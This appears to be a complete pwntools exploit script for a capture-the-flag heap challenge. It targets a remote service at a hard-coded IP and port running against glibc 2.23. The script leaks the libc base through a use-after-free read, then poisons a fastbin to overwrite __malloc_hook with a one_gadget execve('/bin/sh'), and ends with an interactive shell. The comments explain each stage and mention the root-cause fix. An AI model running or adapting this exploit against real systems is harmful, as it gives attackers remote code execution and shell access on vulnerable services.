from pwn import *
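# Target selection. The original script spawned a local process and then
# immediately rebound `p` to the remote connection, leaving an orphaned local
# process running for the whole session; only one tube is opened here.
LOCAL = False
HOST, PORT = "82.157.5.28", 51602

elf = ELF("./uaf_pwn")
# The libc/ld pair the challenge ships with (Ubuntu glibc 2.23). Every offset
# used later (unsorted-bin fd -> base, one_gadget) is specific to this build.
libc = ELF("/home/shoucheng/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
ld = ELF("/home/shoucheng/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so")

if LOCAL:
    # Run the binary under the matching loader with the 2.23 libc preloaded so
    # a local run resolves the same addresses as the remote service.
    p = process(argv=[ld.path, elf.path], env={"LD_PRELOAD": libc.path})
else:
    p = remote(HOST, PORT)


def debug():
    """Attach gdb to the live tube with a breakpoint on main (meant for LOCAL runs)."""
    gdb.attach(p, "b main")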
def _pick(option):
    """Answer the main menu prompt `>` with *option*."""
    p.sendlineafter(">", option)


def _reply(prompt, value):
    """Wait for *prompt* and send *value* followed by a newline."""
    p.recvuntil(prompt)
    p.sendline(value)


def add(size):
    """Menu option 1: request a chunk of *size* bytes from the service."""
    _pick('1')
    _reply("size>", str(size))


def edit(idx, content):
    """Menu option 3: write *content* into chunk *idx*.

    *content* is sent raw (no trailing newline) so binary payloads such as
    packed pointers arrive byte-for-byte.
    """
    _pick('3')
    _reply("index>", str(idx))
    p.recvuntil("content>")
    p.send(content)
def show(idx):
    """Menu option 4: ask the service to print chunk *idx*.

    The caller reads the printed bytes from the tube afterwards; the script
    relies on this succeeding for an already-freed index.
    """
    option = '4'
    p.sendlineafter(">", option)
    p.recvuntil("index>")
    answer = str(idx)
    p.sendline(answer)
def free(idx):
    """Menu option 2: release chunk *idx* back to the allocator."""
    option = '2'
    p.sendlineafter(">", option)
    p.recvuntil("index>")
    answer = str(idx)
    p.sendline(answer)
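# one_gadget output for this libc build. Each entry only works when its
# register/stack constraint holds at the moment the hook is invoked.
'''
0x45226 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL
0xf03a4 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL
0xf1247 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL
'''

# Stage 0: the service prints a hex address at startup; it is only logged here.
p.recvuntil("0x")
target = int(p.recv(12), 16)
log.info("target==>0x%x" % target)

# Stage 1: libc leak. A 0x80-byte request is above fastbin size on 2.23, so
# freeing it leaves main_arena pointers in the chunk's fd/bk. show(0) after
# free(0) is the use-after-free read: it only works because the program keeps
# the freed pointer usable. 0x3c4b78 is the distance from the leaked pointer
# to the libc base for this exact build (presumably main_arena+0x58 -- confirm
# before reusing with any other libc). Chunk indices below assume the
# service hands them out sequentially from 0.
add(0x80)   # idx 0
add(0x60)   # idx 1
free(0)
show(0)
# Pad the 6 leaked bytes to a u64. The fill must be bytes: a str fill raises
# TypeError on Python 3 pwntools, where recv() returns bytes.
libc_base = u64(p.recv(6).ljust(8, b'\x00')) - 0x3c4b78
log.info("libc_base==>0x%x" % libc_base)
mlh = libc_base + libc.sym['__malloc_hook']
ogg = libc_base + 0x4527a   # the "[rsp+0x30] == NULL" gadget from the list above

# Stage 2: corrupt the 0x60 fastbin through the same UAF, this time as a write
# (edit on a freed index) so the next allocations land next to __malloc_hook.
# Both of these rely on 2.23 behaviour: no tcache (added in 2.26) and malloc
# hooks still honoured (removed in 2.34). The root-cause fix on the target side
# is to clear the slot on free and reject freed indices in edit/show.
add(0x60)   # idx 2
free(1)
free(2)
edit(2, p64(mlh - 0x23))
add(0x60)   # idx 3
add(0x60)   # idx 4: user data starts at mlh - 0x23 + 0x10 = mlh - 0x13
# 3 + 8 + 8 = 0x13 bytes of filler, so the gadget address lands on __malloc_hook.
edit(4, p8(0) * 3 + p64(0) * 2 + p64(ogg))

# Stage 3: any further allocation goes through the overwritten hook.
add(0x20)
p.interactive()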